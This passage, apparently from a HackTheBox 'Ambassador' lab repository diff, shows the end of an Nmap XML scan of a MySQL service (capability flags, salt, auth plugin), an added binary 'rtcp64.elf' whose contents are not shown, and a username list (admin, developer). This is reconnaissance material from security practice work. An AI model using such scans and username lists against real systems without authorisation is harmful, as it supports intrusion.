<elem>SupportsLoadDataLocal</elem>
<elem>LongPassword</elem>
<elem>IgnoreSigpipes</elem>
<elem>SupportsTransactions</elem>
<elem>Speaks41ProtocolNew</elem>
<elem>DontAllowDatabaseTableColumn</elem>
<elem>FoundRows</elem>
<elem>SupportsCompression</elem>
<elem>InteractiveClient</elem>
<elem>SwitchToSSLAfterHandshake</elem>
<elem>IgnoreSpaceBeforeParenthesis</elem>
<elem>ConnectWithDatabase</elem>
<elem>LongColumnFlag</elem>
<elem>ODBCClient</elem>
<elem>SupportsMultipleStatments</elem>
<elem>SupportsAuthPlugins</elem>
<elem>SupportsMultipleResults</elem>
</table>
<elem key="Status">Autocommit</elem>
<elem key="Salt">\x01g1&#xd;&lt;8\x19#\x08@u6\x18S\x06VdJ&#xd;[</elem>
<elem key="Auth Plugin Name">caching_sha2_password</elem>
</script></port>
</ports>
<times srtt="46509" rttvar="1023" to="100000"/>
</host>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<runstats><finished time="1674563263" timestr="Tue Jan 24 07:27:43 2023" summary="Nmap done at Tue Jan 24 07:27:43 2023; 1 IP address (1 host up) scanned in 294.24 seconds" elapsed="294.24" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

BIN
HTB/ambassador/rtcp64.elf Normal file

Binary file not shown.

2
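--- a/HTB/ambassador/users
+++ b/HTB/ambassador/users
@@ -0,0 +1,2 @@
+admin
+developer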